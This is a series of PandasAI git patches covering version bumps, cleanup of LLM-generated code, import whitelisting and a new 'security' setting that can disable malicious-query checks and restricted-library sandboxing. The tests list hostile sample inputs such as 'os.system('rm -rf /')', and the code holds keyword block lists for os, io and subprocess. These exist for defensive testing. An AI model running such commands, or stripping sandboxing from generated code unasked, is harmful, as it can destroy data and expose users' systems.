- return self._agent.last_code_executed
+ return self._agent.last_code_generated
@property
def last_code_executed(self):
From 68b65576f19c73707c20594de4dd89ae5b7e3175 Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 18 Dec 2024 10:11:11 +0100
Subject: [PATCH 12/58] Release v2.4.1
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index a2697aaa0..4ef20a0df 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.4.0"
+version = "2.4.1"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From daf569677acb77ab4f4af5607685196f27c754f6 Mon Sep 17 00:00:00 2001
From: Charis Nikolaidis
Date: Thu, 19 Dec 2024 10:19:35 +0200
Subject: [PATCH 13/58] fix: docker-compose-npm-error (#1486)
-Simplified the type of children to just React.ReactNode, which is the standard type for React components' children prop.
---
client/components/card/index.tsx | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/client/components/card/index.tsx b/client/components/card/index.tsx
index 028f368e2..1d2f61be8 100644
--- a/client/components/card/index.tsx
+++ b/client/components/card/index.tsx
@@ -1,8 +1,9 @@
import React from "react";
+
function Card(props: {
className?: string;
extra?: string;
- children?: React.ReactNode | Element;
+ children?: React.ReactNode; // Simplified type
default?: boolean;
}) {
const { extra, children, ...rest } = props;
@@ -11,7 +12,7 @@ function Card(props: {
className={`!z-5 relative flex flex-col rounded-[20px] shadow-[rgba(0, 0, 0, 0.2)] shadow-md border border-gray-100 dark:border-none dark:shadow-none bg-clip-border dark:!bg-darkMain dark:text-white ${extra}`}
{...rest}
>
- <>{children}>
+ {children} {/* Removed unnecessary fragment */}
);
}
From d63f918372930e9d8df21022018c2c5f2f1db169 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:31:21 +0100
Subject: [PATCH 14/58] fix: remove plt.show if exists in the generated code
(#1501)
---
pandasai/pipelines/chat/code_cleaning.py | 4 ++++
.../smart_datalake/test_code_cleaning.py | 18 ++++++++++++++++++
2 files changed, 22 insertions(+)
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 5e86975df..a185aeec4 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -145,11 +145,15 @@ def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
save_charts_path_str=f"{find_project_root()}/exports/charts",
)
+ # If plt.show is in the code, remove that line
+ code = re.sub(r"plt.show\(\)", "", code)
+
# Reset used skills
context.skills_manager.used_skills = []
# Get the code to run removing unsafe imports and df overwrites
code_to_run = self._clean_code(code, context)
+
self._logger.log(
f"""
Code running:
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 49169f373..d632f6cc3 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -928,3 +928,21 @@ def test_clean_code_raise_import_with_restricted_using_import_statement(
"""
with pytest.raises(MaliciousQueryError):
code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_with_pltshow_in_code(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import matplotlib.pyplot as plt
+print('test plt.show is removed')
+plt.show()
+"""
+ code = code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ assert code.output == """print('test plt.show is removed')"""
+ assert isinstance(code, LogicUnitOutput)
+ assert code.success is True
+ assert code.message == "Code Cleaned Successfully"
From 63df0175c9fb664a7ffc000ea6cd26a51d8c08a8 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:32:05 +0100
Subject: [PATCH 15/58] fix: make seaborn as an optional dependency (#1500)
* fix: make seaborn as an optional dependency
* fix: linting errors
---
pandasai/helpers/dataframe_serializer.py | 5 +++--
pandasai/helpers/optional.py | 3 ++-
2 files changed, 5 insertions(+), 3 deletions(-)
diff --git a/pandasai/helpers/dataframe_serializer.py b/pandasai/helpers/dataframe_serializer.py
index cfaffc9b4..e081fa762 100644
--- a/pandasai/helpers/dataframe_serializer.py
+++ b/pandasai/helpers/dataframe_serializer.py
@@ -1,8 +1,6 @@
import json
from enum import Enum
-import yaml
-
import pandasai.pandas as pd
@@ -160,6 +158,9 @@ def convert_df_to_json_str(self, df: pd.DataFrame, extras: dict) -> str:
def convert_df_to_yml(self, df: pd.DataFrame, extras: dict) -> str:
json_df = self.convert_df_to_json(df, extras)
+
+ import yaml
+
yml_str = yaml.dump(json_df, sort_keys=False, allow_unicode=True)
if "is_direct_sql" in extras and extras["is_direct_sql"]:
return f"\n"
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index f1d7a830a..2bcdcc146 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -19,7 +19,6 @@
from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
from pandasai.safe_libs.restricted_pandas import RestrictedPandas
-from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
if TYPE_CHECKING:
import types
@@ -80,6 +79,8 @@ def get_environment(additional_deps: List[dict]) -> dict:
for lib in additional_deps:
if lib["name"] == "seaborn":
+ from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
+
env["sns"] = RestrictedSeaborn()
if lib["name"] == "datetime":
From cfeb071308fc857ea3d54c191e8e73a6f5638b80 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:32:29 +0100
Subject: [PATCH 16/58] fix: check if whitelisted lib is actually exists in the
additional deps (#1499)
---
pandasai/pipelines/chat/code_cleaning.py | 27 +++++++++----------
.../smart_datalake/test_code_cleaning.py | 4 +++
2 files changed, 17 insertions(+), 14 deletions(-)
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index a185aeec4..96dbd91f9 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -627,23 +627,22 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
if library == "pandas":
return
- if (
- library
- in WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
- ):
- for alias in node.names:
- self._additional_dependencies.append(
- {
- "module": module,
- "name": alias.name,
- "alias": alias.asname or alias.name,
- }
- )
- return
+ whitelisted_libs = (
+ WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
+ )
- if library not in WHITELISTED_LIBRARIES:
+ if library not in whitelisted_libs:
raise BadImportError(
f"The library '{library}' is not in the list of whitelisted libraries. "
"To learn how to whitelist custom dependencies, visit: "
"https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
)
+
+ for alias in node.names:
+ self._additional_dependencies.append(
+ {
+ "module": module,
+ "name": alias.name,
+ "alias": alias.asname or alias.name,
+ }
+ )
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index d632f6cc3..9506a06bb 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -309,7 +309,11 @@ def test_custom_whitelisted_dependencies(
code_cleaning._config.custom_whitelisted_dependencies = ["my_custom_library"]
output = code_cleaning.execute(code, context=context, logger=logger)
+ print(code_cleaning._additional_dependencies)
assert output.output == "my_custom_library.do_something()"
+ assert (
+ code_cleaning._additional_dependencies[0]["module"] == "my_custom_library"
+ )
assert isinstance(output, LogicUnitOutput)
assert output.success
assert output.message == "Code Cleaned Successfully"
From 554a638eee356dfe79b7275264b651533020493b Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 19:02:53 +0100
Subject: [PATCH 17/58] feat(security): add security config to disable it
(#1498)
* feat(security): add security config to disable it
* fix: linting errors
* fix(safety): push exact match for get attributes
* add additional test case
* fix: test case
* fix: linting errors
* fix: linting errors
* docs(config): update config doc to add new config attribute
---
docs/library.mdx | 1 +
pandasai/agent/base.py | 5 +-
pandasai/helpers/optional.py | 47 +++++++++++++------
pandasai/pipelines/chat/code_cleaning.py | 11 ++++-
pandasai/pipelines/chat/code_execution.py | 5 +-
pandasai/safe_libs/base_restricted_module.py | 2 +-
pandasai/schemas/df_config.py | 3 +-
tests/unit_tests/agent/test_agent.py | 34 ++++++++++++++
.../helpers/test_optional_dependency.py | 15 ++++++
.../smart_datalake/test_code_cleaning.py | 30 ++++++++++--
10 files changed, 128 insertions(+), 25 deletions(-)
diff --git a/docs/library.mdx b/docs/library.mdx
index a1e01097d..228c6d95f 100644
--- a/docs/library.mdx
+++ b/docs/library.mdx
@@ -222,6 +222,7 @@ Settings:
- `use_error_correction_framework`: whether to use the error correction framework. Defaults to `True`. If set to `True`, PandasAI will try to correct the errors in the code generated by the LLM with further calls to the LLM. If set to `False`, PandasAI will not try to correct the errors in the code generated by the LLM.
- `max_retries`: the maximum number of retries to use when using the error correction framework. Defaults to `3`. You can use this setting to override the default number of retries.
- `custom_whitelisted_dependencies`: the custom whitelisted dependencies to use. Defaults to `{}`. You can use this setting to override the default custom whitelisted dependencies. You can find more information about custom whitelisted dependencies [here](/custom-whitelisted-dependencies).
+- `security`: The “security” parameter allows for three levels depending on specific use cases: “none,” “standard,” and “advanced.” "standard" and "advanced" are especially useful for detecting malicious intent from user queries and avoiding the execution of potentially harmful code. By default, the “security” is set to "standard." The security check might introduce stricter rules that could flag benign queries as harmful. You can deactivate it in the configuration by setting “security” to “none.”
## Demo in Google Colab
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index c6203111d..0c29ada1c 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -259,7 +259,10 @@ def chat(self, query: str, output_type: Optional[str] = None):
self.assign_prompt_id()
- if self.check_malicious_keywords_in_query(query):
+ if self.config.security in [
+ "standard",
+ "advanced",
+ ] and self.check_malicious_keywords_in_query(query):
raise MaliciousQueryError(
"The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways."
)
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index 2bcdcc146..3b3f23289 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -51,7 +51,7 @@ def get_version(module: types.ModuleType) -> str:
return version
-def get_environment(additional_deps: List[dict]) -> dict:
+def get_environment(additional_deps: List[dict], secure: bool = True) -> dict:
"""
Returns the environment for the code to be executed.
@@ -73,24 +73,43 @@ def get_environment(additional_deps: List[dict]) -> dict:
},
}
- env["pd"] = RestrictedPandas()
- env["plt"] = RestrictedMatplotlib()
- env["np"] = RestrictedNumpy()
+ if secure:
+ env["pd"] = RestrictedPandas()
+ env["plt"] = RestrictedMatplotlib()
+ env["np"] = RestrictedNumpy()
- for lib in additional_deps:
- if lib["name"] == "seaborn":
- from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
- env["sns"] = RestrictedSeaborn()
+ env["sns"] = RestrictedSeaborn()
- if lib["name"] == "datetime":
- env["datetime"] = RestrictedDatetime()
+ if lib["name"] == "datetime":
+ env["datetime"] = RestrictedDatetime()
- if lib["name"] == "json":
- env["json"] = RestrictedJson()
+ if lib["name"] == "json":
+ env["json"] = RestrictedJson()
- if lib["name"] == "base64":
- env["base64"] = RestrictedBase64()
+ if lib["name"] == "base64":
+ env["base64"] = RestrictedBase64()
+
+ else:
+ env["pd"] = import_dependency("pandas")
+ env["plt"] = import_dependency("matplotlib.pyplot")
+ env["np"] = import_dependency("numpy")
+
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ env["sns"] = import_dependency("seaborn")
+
+ if lib["name"] == "datetime":
+ env["datetime"] = import_dependency("datetime")
+
+ if lib["name"] == "json":
+ env["json"] = import_dependency("json")
+
+ if lib["name"] == "base64":
+ env["base64"] = import_dependency("base64")
return env
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 96dbd91f9..398c10cf9 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -121,10 +121,14 @@ def _replace_plot_png(self, code):
return re.sub(r"""(['"])([^'"]*\.png)\1""", r"\1temp_chart.png\1", code)
def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
- if self._is_malicious_code(code):
+ if self._config.security in [
+ "standard",
+ "advanced",
+ ] and self._is_malicious_code(code):
raise MaliciousQueryError(
"Code shouldn't use 'os', 'io' or 'chr', 'b64decode' functions as this could lead to malicious code execution."
)
+
code = self._replace_plot_png(code)
self._current_code_executed = code
@@ -475,7 +479,10 @@ def _extract_fix_dataframe_redeclarations(
if target_names and self._check_is_df_declaration(node):
# Construct dataframe from node
code = "\n".join(code_lines)
- env = get_environment(self._additional_dependencies)
+ env = get_environment(
+ self._additional_dependencies,
+ secure=self._config.security in ["standard", "advanced"],
+ )
env["dfs"] = copy.deepcopy(self._get_originals(self._dfs))
if context.skills_manager.used_skills:
for skill_func_name in context.skills_manager.used_skills:
diff --git a/pandasai/pipelines/chat/code_execution.py b/pandasai/pipelines/chat/code_execution.py
index 65acf4656..6ee25ce22 100644
--- a/pandasai/pipelines/chat/code_execution.py
+++ b/pandasai/pipelines/chat/code_execution.py
@@ -153,7 +153,10 @@ def execute_code(self, code: str, context: CodeExecutionContext) -> Any:
# List the required dfs, so we can avoid to run the connectors
# if the code does not need them
dfs = self._required_dfs(code)
- environment: dict = get_environment(self._additional_dependencies)
+ environment: dict = get_environment(
+ self._additional_dependencies,
+ secure=self._config.security in ["standard", "advanced"],
+ )
environment["dfs"] = self._get_originals(dfs)
if len(environment["dfs"]) == 1:
environment["df"] = environment["dfs"][0]
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
index 3067a3aab..65e1864bd 100644
--- a/pandasai/safe_libs/base_restricted_module.py
+++ b/pandasai/safe_libs/base_restricted_module.py
@@ -4,7 +4,7 @@ def wrapper(*args, **kwargs):
# Check for any suspicious arguments that might be used for importing
for arg in args + tuple(kwargs.values()):
if isinstance(arg, str) and any(
- module in arg.lower()
+ module == arg.lower()
for module in ["io", "os", "subprocess", "sys", "importlib"]
):
raise SecurityError(
diff --git a/pandasai/schemas/df_config.py b/pandasai/schemas/df_config.py
index eec8307c4..398c466d7 100644
--- a/pandasai/schemas/df_config.py
+++ b/pandasai/schemas/df_config.py
@@ -1,4 +1,4 @@
-from typing import Any, List, Optional, TypedDict
+from typing import Any, List, Literal, Optional, TypedDict
from pandasai.constants import DEFAULT_CHART_DIRECTORY
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
@@ -30,6 +30,7 @@ class Config(BaseModel):
log_server: LogServerConfig = None
direct_sql: bool = False
dataframe_serializer: DataframeSerializerType = DataframeSerializerType.CSV
+ security: Literal["standard", "none", "advanced"] = "standard"
class Config:
arbitrary_types_allowed = True
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 59b9e6958..c1e9986fd 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -710,3 +710,37 @@ def test_query_detection(self, sample_df, config):
for query in safe_queries:
response = agent.chat(query)
assert "Unfortunately, I was not able to get your answers" not in response
+
+ def test_query_detection_disable_security(self, sample_df, config):
+ config["security"] = "none"
+ agent = Agent(sample_df, config, memory_size=10)
+
+ malicious_queries = [
+ "import os",
+ "import io",
+ "chr(97)",
+ "base64.b64decode",
+ "file = open('file.txt', 'os')",
+ "os.system('rm -rf /')",
+ "io.open('file.txt', 'w')",
+ ]
+
+ expected_malicious_response = (
+ """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
+ """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
+ )
+
+ for query in malicious_queries:
+ response = agent.chat(query)
+ assert response != expected_malicious_response
+
+ safe_queries = [
+ "print('Hello world')",
+ "through osmosis",
+ "the ionosphere",
+ "the capital of Norway is Oslo",
+ ]
+
+ for query in safe_queries:
+ response = agent.chat(query)
+ assert "Unfortunately, I was not able to get your answers" not in response
diff --git a/tests/unit_tests/helpers/test_optional_dependency.py b/tests/unit_tests/helpers/test_optional_dependency.py
index db7ed2c2f..e06008ed7 100644
--- a/tests/unit_tests/helpers/test_optional_dependency.py
+++ b/tests/unit_tests/helpers/test_optional_dependency.py
@@ -9,6 +9,9 @@
import pytest
from pandasai.helpers.optional import VERSIONS, get_environment, import_dependency
+from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
+from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.safe_libs.restricted_pandas import RestrictedPandas
def test_import_optional():
@@ -91,3 +94,15 @@ def test_env_for_necessary_deps():
assert "pd" in env
assert "plt" in env
assert "np" in env
+
+
+def test_env_for_security():
+ env = get_environment([], secure=True)
+ assert "pd" in env and isinstance(env["pd"], RestrictedPandas)
+ assert "plt" in env and isinstance(env["plt"], RestrictedMatplotlib)
+ assert "np" in env and isinstance(env["np"], RestrictedNumpy)
+
+ env = get_environment([], secure=False)
+ assert "pd" in env and not isinstance(env["pd"], RestrictedPandas)
+ assert "plt" in env and not isinstance(env["plt"], RestrictedMatplotlib)
+ assert "np" in env and not isinstance(env["np"], RestrictedNumpy)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 9506a06bb..be3c83963 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -581,13 +581,16 @@ def test_clean_code_using_multi_incorrect_sql_table(
assert str(excinfo.value) == ("Query uses unauthorized table: table1.")
@patch("pandasai.connectors.pandas.PandasConnector.head")
- def test_fix_dataframe_redeclarations(self, mock_head, context: PipelineContext):
+ def test_fix_dataframe_redeclarations(
+ self, mock_head, context: PipelineContext, config: dict
+ ):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
pandas_connector = PandasConnector({"original_df": df})
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -605,7 +608,7 @@ def test_fix_dataframe_redeclarations(self, mock_head, context: PipelineContext)
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_multiline_redeclarations(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
@@ -613,6 +616,7 @@ def test_fix_dataframe_multiline_redeclarations(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -664,7 +668,7 @@ def test_fix_dataframe_no_redeclarations(self, mock_head, context: PipelineConte
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_with_subscript(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
@@ -672,6 +676,7 @@ def test_fix_dataframe_redeclarations_with_subscript(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -689,7 +694,7 @@ def test_fix_dataframe_redeclarations_with_subscript(
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
data = {
"country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
@@ -701,6 +706,7 @@ def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -723,7 +729,7 @@ def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_and_data_variable(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: Config
):
data = {
"country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
@@ -735,6 +741,7 @@ def test_fix_dataframe_redeclarations_and_data_variable(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -933,6 +940,19 @@ def test_clean_code_raise_import_with_restricted_using_import_statement(
with pytest.raises(MaliciousQueryError):
code_cleaning.execute(malicious_code, context=context, logger=logger)
+ def test_clean_code_raise_not_whitelisted_lib_with_none_security(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ builtins_code = """import scipy
+result = {'type': 'number', 'value': set([1, 2, 3])}"""
+
+ context.config.security = "none"
+ with pytest.raises(BadImportError):
+ code_cleaning.execute(builtins_code, context=context, logger=logger)
+
def test_clean_code_with_pltshow_in_code(
self,
code_cleaning: CodeCleaning,
From cf33faa5de1fd6ae565240b8eb4373f5de7c929f Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Thu, 2 Jan 2025 19:09:29 +0100
Subject: [PATCH 18/58] Release v2.4.2
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index 4ef20a0df..a5ccdcfff 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.4.1"
+version = "2.4.2"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From 52b04aaf94bff935c0bbd3e3b9d6323e68afeacb Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:31:38 +0100
Subject: [PATCH 19/58] fix(test_cases): handle and clean test cases of
pandasai
---
.../pandasai_databricks/databricks.py | 194 ----
.../oracle/pandasai_oracle/oracle.py | 62 --
.../snowflake/pandasai_snowflake/snowflake.py | 123 ---
.../llms/bedrock/pandasai_bedrock/base.py | 2 +-
.../llms/bedrock/pandasai_bedrock/claude.py | 2 +-
.../llms/bedrock/tests/test_bedrock_claude.py | 2 +-
.../llms/google/pandasai_google/base.py | 2 +-
.../huggingface_text_gen.py | 2 +-
.../llms/ibm/pandasai_ibm/ibm_watsonx.py | 4 +-
.../langchain/pandasai_langchain/langchain.py | 2 +-
.../llms/local/pandasai_local/local_llm.py | 2 +-
.../llms/openai/pandasai_openai/base.py | 2 +-
pandasai/agent/base.py | 19 +-
pandasai/{chat => core}/cache.py | 0
.../{chat => core}/code_execution/__init__.py | 0
.../code_execution/code_executor.py | 2 +-
.../code_execution/environment.py | 0
.../safe_libs/base_restricted_module.py | 8 +-
.../safe_libs/restricted_base64.py | 0
.../safe_libs/restricted_datetime.py | 0
.../safe_libs/restricted_json.py | 0
.../safe_libs/restricted_matplotlib.py | 0
.../safe_libs/restricted_numpy.py | 0
.../safe_libs/restricted_pandas.py | 0
.../safe_libs/restricted_seaborn.py | 0
.../code_generation/__init__.py | 0
.../{chat => core}/code_generation/base.py | 2 +-
.../code_generation/code_cleaning.py | 6 +-
.../code_generation/code_security.py | 0
.../code_generation/code_validation.py | 0
pandasai/{chat => core}/prompts/__init__.py | 4 +-
pandasai/{chat => core}/prompts/base.py | 0
.../prompts/correct_error_prompt.py | 0
...ct_execute_sql_query_usage_error_prompt.py | 2 +-
.../correct_output_type_error_prompt.py | 0
.../prompts/file_based_prompt.py | 0
.../prompts/generate_python_code.py | 0
.../prompts/generate_python_code_with_sql.py | 2 +-
.../prompts/generate_system_message.py | 0
.../templates/correct_error_prompt.tmpl | 0
..._execute_sql_query_usage_error_prompt.tmpl | 0
.../correct_output_type_error_prompt.tmpl | 0
.../templates/generate_python_code.tmpl | 0
.../generate_python_code_with_sql.tmpl | 0
.../templates/generate_system_message.tmpl | 0
.../prompts/templates/shared/dataframe.tmpl | 0
.../shared/output_type_template.tmpl | 0
.../templates/shared/vectordb_docs.tmpl | 0
pandasai/{chat => core}/response/__init__.py | 0
pandasai/{chat => core}/response/base.py | 2 +
.../{chat => core}/response/response_types.py | 0
pandasai/{chat => core}/user_query.py | 6 +-
pandasai/llm/bamboo_llm.py | 2 +-
pandasai/llm/base.py | 4 +-
pandasai/llm/fake.py | 2 +-
pandasai/pipelines/chat/code_cleaning.py | 611 ------------
pandasai/pipelines/chat/code_execution.py | 316 ------
.../pipelines/chat/validate_pipeline_input.py | 29 -
pandasai/safe_libs/base_restricted_module.py | 27 -
pandasai/safe_libs/restricted_base64.py | 21 -
pandasai/safe_libs/restricted_datetime.py | 64 --
pandasai/safe_libs/restricted_json.py | 23 -
pandasai/safe_libs/restricted_matplotlib.py | 76 --
pandasai/safe_libs/restricted_numpy.py | 182 ----
pandasai/safe_libs/restricted_pandas.py | 110 ---
pandasai/safe_libs/restricted_seaborn.py | 74 --
pandasai/schemas/__init__.py | 1 -
tests/unit_tests/agent/test_agent.py | 416 +++++---
tests/unit_tests/agent/test_base_agent.py | 60 --
.../safe_libs/test_base_restricted_module.py | 146 +++
.../code_execution/test_code_execution.py | 129 +++
.../core/code_execution/test_environment.py | 87 ++
.../code_generation/test_code_cleaning.py | 179 ++++
.../code_generation/test_code_security.py | 94 ++
.../code_generation/test_code_validation.py | 72 ++
tests/unit_tests/core/prompts/test_prompts.py | 93 ++
tests/unit_tests/dataframe/test_dataframe.py | 18 +-
tests/unit_tests/dataframe/test_loader.py | 17 +-
.../helpers/test_optional_dependency.py | 14 +-
tests/unit_tests/helpers/test_responses.py | 127 ++-
tests/unit_tests/llms/test_bamboo_llm.py | 9 +-
.../smart_datalake/test_code_cleaning.py | 917 ------------------
.../smart_datalake/test_code_execution.py | 326 -------
.../smart_datalake/test_code_generator.py | 112 ---
.../test_error_prompt_generation.py | 111 ---
.../smart_datalake/test_prompt_generation.py | 127 ---
.../smart_datalake/test_result_parsing.py | 133 ---
.../smart_datalake/test_result_validation.py | 135 ---
.../test_validate_pipeline_input.py | 239 -----
tests/unit_tests/pipelines/test_pipeline.py | 163 ----
.../prompts/test_correct_error_prompt.py | 6 +-
.../test_generate_python_code_prompt.py | 25 +-
tests/unit_tests/prompts/test_sql_prompt.py | 20 +-
.../responses/test_response_serializer.py | 34 -
tests/unit_tests/schemas/__init__.py | 0
tests/unit_tests/schemas/test_df_config.py | 18 -
tests/unit_tests/test_pandasai_init.py | 101 +-
97 files changed, 1345 insertions(+), 4577 deletions(-)
delete mode 100644 extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
delete mode 100644 extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
delete mode 100644 extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
rename pandasai/{chat => core}/cache.py (100%)
rename pandasai/{chat => core}/code_execution/__init__.py (100%)
rename pandasai/{chat => core}/code_execution/code_executor.py (98%)
rename pandasai/{chat => core}/code_execution/environment.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/base_restricted_module.py (74%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_base64.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_datetime.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_json.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_matplotlib.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_numpy.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_pandas.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_seaborn.py (100%)
rename pandasai/{chat => core}/code_generation/__init__.py (100%)
rename pandasai/{chat => core}/code_generation/base.py (97%)
rename pandasai/{chat => core}/code_generation/code_cleaning.py (98%)
rename pandasai/{chat => core}/code_generation/code_security.py (100%)
rename pandasai/{chat => core}/code_generation/code_validation.py (100%)
rename pandasai/{chat => core}/prompts/__init__.py (94%)
rename pandasai/{chat => core}/prompts/base.py (100%)
rename pandasai/{chat => core}/prompts/correct_error_prompt.py (100%)
rename pandasai/{chat => core}/prompts/correct_execute_sql_query_usage_error_prompt.py (94%)
rename pandasai/{chat => core}/prompts/correct_output_type_error_prompt.py (100%)
rename pandasai/{chat => core}/prompts/file_based_prompt.py (100%)
rename pandasai/{chat => core}/prompts/generate_python_code.py (100%)
rename pandasai/{chat => core}/prompts/generate_python_code_with_sql.py (76%)
rename pandasai/{chat => core}/prompts/generate_system_message.py (100%)
rename pandasai/{chat => core}/prompts/templates/correct_error_prompt.tmpl (100%)
